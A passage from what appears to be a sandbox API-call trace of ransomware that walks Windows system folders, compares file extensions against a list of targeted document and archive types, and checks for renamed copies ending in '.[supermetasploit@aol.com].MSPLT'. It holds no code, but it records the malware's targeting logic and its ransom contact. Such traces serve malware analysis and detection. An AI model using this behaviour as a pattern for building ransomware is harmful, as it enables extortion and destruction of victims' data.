(hObject=0x3b4) returned 1 [0285.381] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b")) returned 0x20 [0285.381] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\updaterevokesipolicy.p7b.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.381] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.381] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.381] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.381] lstrlenW (lpString=".doc") returned 4 [0285.381] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0285.381] lstrlenW (lpString=".docx") returned 5 [0285.381] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0285.381] lstrlenW (lpString=".pdf") returned 4 [0285.381] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0285.381] lstrlenW (lpString=".xls") returned 4 [0285.381] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0285.381] lstrlenW (lpString=".xlsx") returned 5 [0285.382] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0285.382] lstrlenW (lpString=".ppt") returned 4 [0285.382] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0285.382] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.382] lstrlenW (lpString=".zip") returned 4 [0285.382] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0285.382] lstrlenW (lpString=".rar") returned 4 [0285.382] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0285.382] lstrlenW (lpString=".bz2") returned 4 [0285.382] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0285.382] lstrlenW (lpString=".7z") returned 3 [0285.382] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0285.382] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.382] lstrlenW (lpString=".dbf") returned 4 [0285.382] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0285.382] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.382] lstrlenW (lpString=".1cd") returned 4 [0285.382] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0285.382] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.382] lstrlenW (lpString=".jpg") returned 4 [0285.382] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0285.382] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.382] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.382] lstrlenW (lpString=".doc") returned 4 [0285.382] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0285.382] lstrlenW (lpString=".docx") returned 5 [0285.382] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0285.383] lstrlenW (lpString=".pdf") returned 4 [0285.383] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0285.383] lstrlenW (lpString=".xls") returned 4 [0285.383] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0285.383] lstrlenW (lpString=".xlsx") returned 5 [0285.383] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0285.383] lstrlenW (lpString=".ppt") returned 4 [0285.383] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0285.383] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.383] lstrlenW (lpString=".zip") returned 4 [0285.383] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0285.383] lstrlenW (lpString=".rar") returned 4 [0285.383] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0285.383] lstrlenW (lpString=".bz2") returned 4 [0285.383] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0285.383] lstrlenW (lpString=".7z") returned 3 [0285.383] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0285.383] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.383] lstrlenW (lpString=".dbf") returned 4 [0285.383] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0285.383] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.383] lstrlenW (lpString=".1cd") returned 4 [0285.383] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0285.383] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0285.383] lstrlenW (lpString=".jpg") returned 4 [0285.383] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0285.384] Sleep (dwMilliseconds=0x64) [0285.703] Sleep (dwMilliseconds=0x64) [0285.965] Sleep (dwMilliseconds=0x64) [0286.274] Sleep (dwMilliseconds=0x64) [0286.452] Sleep (dwMilliseconds=0x64) [0286.572] Sleep (dwMilliseconds=0x64) [0287.481] Sleep (dwMilliseconds=0x64) [0287.671] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0287.671] lstrlenW (lpString="boxed-join.avi") returned 14 [0287.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0287.838] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=46622) returned 1 [0287.838] CloseHandle (hObject=0x434) returned 1 [0287.839] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0287.839] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.839] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.840] lstrlenW (lpString=".doc") returned 4 [0287.840] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.840] lstrlenW (lpString=".docx") returned 5 [0287.840] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0287.840] lstrlenW (lpString=".pdf") returned 4 [0287.840] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.840] lstrlenW (lpString=".xls") returned 4 [0287.840] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.840] lstrlenW (lpString=".xlsx") returned 5 [0287.840] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0287.840] lstrlenW (lpString=".ppt") returned 4 [0287.840] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.840] lstrlenW (lpString=".zip") returned 4 [0287.840] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.840] lstrlenW (lpString=".rar") returned 4 [0287.840] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.840] lstrlenW (lpString=".bz2") returned 4 [0287.840] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.840] lstrlenW (lpString=".7z") returned 3 [0287.840] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.840] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.840] lstrlenW (lpString=".dbf") returned 4 [0287.840] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.841] lstrlenW (lpString=".1cd") returned 4 [0287.841] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.841] lstrlenW (lpString=".jpg") returned 4 [0287.841] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.841] lstrlenW (lpString=".doc") returned 4 [0287.841] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.841] lstrlenW (lpString=".docx") returned 5 [0287.841] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0287.841] lstrlenW (lpString=".pdf") returned 4 [0287.841] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.841] lstrlenW (lpString=".xls") returned 4 [0287.841] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.841] lstrlenW (lpString=".xlsx") returned 5 [0287.841] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0287.841] lstrlenW (lpString=".ppt") returned 4 [0287.841] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.841] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.841] lstrlenW (lpString=".zip") returned 4 [0287.841] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.841] lstrlenW (lpString=".rar") returned 4 [0287.841] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.841] lstrlenW (lpString=".bz2") returned 4 [0287.841] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.842] lstrlenW (lpString=".7z") returned 3 [0287.842] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.842] lstrlenW (lpString=".dbf") returned 4 [0287.842] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.842] lstrlenW (lpString=".1cd") returned 4 [0287.842] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.842] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0287.842] lstrlenW (lpString=".jpg") returned 4 [0287.842] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.842] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0287.842] lstrlenW (lpString="correct.avi") returned 11 [0287.842] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0287.852] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=180172) returned 1 [0287.852] CloseHandle (hObject=0x3e4) returned 1 [0287.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0287.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.858] lstrlenW (lpString=".doc") returned 4 [0287.858] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.858] lstrlenW (lpString=".docx") returned 5 [0287.858] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0287.858] lstrlenW (lpString=".pdf") returned 4 [0287.858] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.858] lstrlenW (lpString=".xls") returned 4 [0287.858] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.858] lstrlenW (lpString=".xlsx") returned 5 [0287.859] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0287.859] lstrlenW (lpString=".ppt") returned 4 [0287.859] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.859] lstrlenW (lpString=".zip") returned 4 [0287.859] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.859] lstrlenW (lpString=".rar") returned 4 [0287.859] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.859] lstrlenW (lpString=".bz2") returned 4 [0287.859] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.859] lstrlenW (lpString=".7z") returned 3 [0287.859] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.859] lstrlenW (lpString=".dbf") returned 4 [0287.859] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.859] lstrlenW (lpString=".1cd") returned 4 [0287.859] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.859] lstrlenW (lpString=".jpg") returned 4 [0287.859] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.859] lstrlenW (lpString=".doc") returned 4 [0287.859] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.860] lstrlenW (lpString=".docx") returned 5 [0287.860] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0287.860] lstrlenW (lpString=".pdf") returned 4 [0287.860] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.860] lstrlenW (lpString=".xls") returned 4 [0287.860] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.860] lstrlenW (lpString=".xlsx") returned 5 [0287.860] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0287.860] lstrlenW (lpString=".ppt") returned 4 [0287.860] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.860] lstrlenW (lpString=".zip") returned 4 [0287.860] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.860] lstrlenW (lpString=".rar") returned 4 [0287.860] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.860] lstrlenW (lpString=".bz2") returned 4 [0287.860] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.860] lstrlenW (lpString=".7z") returned 3 [0287.860] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.860] lstrlenW (lpString=".dbf") returned 4 [0287.860] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.860] lstrlenW (lpString=".1cd") returned 4 [0287.860] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0287.861] lstrlenW (lpString=".jpg") returned 4 [0287.861] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.861] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0287.861] lstrlenW (lpString="split.avi") returned 9 [0287.861] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0287.914] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=181964) returned 1 [0287.914] CloseHandle (hObject=0x348) returned 1 [0287.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0287.914] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.914] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.914] lstrlenW (lpString=".doc") returned 4 [0287.914] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.914] lstrlenW (lpString=".docx") returned 5 [0287.914] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0287.914] lstrlenW (lpString=".pdf") returned 4 [0287.914] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.914] lstrlenW (lpString=".xls") returned 4 [0287.915] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.915] lstrlenW (lpString=".xlsx") returned 5 [0287.915] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0287.915] lstrlenW (lpString=".ppt") returned 4 [0287.915] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.915] lstrlenW (lpString=".zip") returned 4 [0287.915] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.915] lstrlenW (lpString=".rar") returned 4 [0287.915] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.915] lstrlenW (lpString=".bz2") returned 4 [0287.915] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.915] lstrlenW (lpString=".7z") returned 3 [0287.915] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.915] lstrlenW (lpString=".dbf") returned 4 [0287.915] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.915] lstrlenW (lpString=".1cd") returned 4 [0287.915] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.915] lstrlenW (lpString=".jpg") returned 4 [0287.915] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.916] lstrlenW (lpString=".doc") returned 4 [0287.916] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.916] lstrlenW (lpString=".docx") returned 5 [0287.916] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0287.916] lstrlenW (lpString=".pdf") returned 4 [0287.916] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.916] lstrlenW (lpString=".xls") returned 4 [0287.916] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.916] lstrlenW (lpString=".xlsx") returned 5 [0287.916] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0287.916] lstrlenW (lpString=".ppt") returned 4 [0287.916] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.916] lstrlenW (lpString=".zip") returned 4 [0287.916] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.916] lstrlenW (lpString=".rar") returned 4 [0287.916] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.916] lstrlenW (lpString=".bz2") returned 4 [0287.916] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.916] lstrlenW (lpString=".7z") returned 3 [0287.916] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.916] lstrlenW (lpString=".dbf") returned 4 [0287.916] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.916] lstrlenW (lpString=".1cd") returned 4 [0287.917] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 66 [0287.917] lstrlenW (lpString=".jpg") returned 4 [0287.917] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.917] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.917] lstrlenW (lpString="insert.xml") returned 10 [0287.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.929] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=215) returned 1 [0287.929] CloseHandle (hObject=0x420) returned 1 [0287.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml")) returned 0x20 [0287.929] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.929] lstrlenW (lpString=".doc") returned 4 [0287.929] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.929] lstrlenW (lpString=".docx") returned 5 [0287.929] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0287.929] lstrlenW (lpString=".pdf") returned 4 [0287.929] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.929] lstrlenW (lpString=".xls") returned 4 [0287.930] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.930] lstrlenW (lpString=".xlsx") returned 5 [0287.930] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0287.930] lstrlenW (lpString=".ppt") returned 4 [0287.930] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.930] lstrlenW (lpString=".zip") returned 4 [0287.930] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.930] lstrlenW (lpString=".rar") returned 4 [0287.930] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.930] lstrlenW (lpString=".bz2") returned 4 [0287.930] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.930] lstrlenW (lpString=".7z") returned 3 [0287.930] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.930] lstrlenW (lpString=".dbf") returned 4 [0287.930] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.930] lstrlenW (lpString=".1cd") returned 4 [0287.930] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.930] lstrlenW (lpString=".jpg") returned 4 [0287.930] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 75 [0287.930] lstrlenW (lpString=".doc") returned 4 [0287.931] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.931] lstrlenW (lpString=".docx") returned 5 [0287.931] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0287.931] 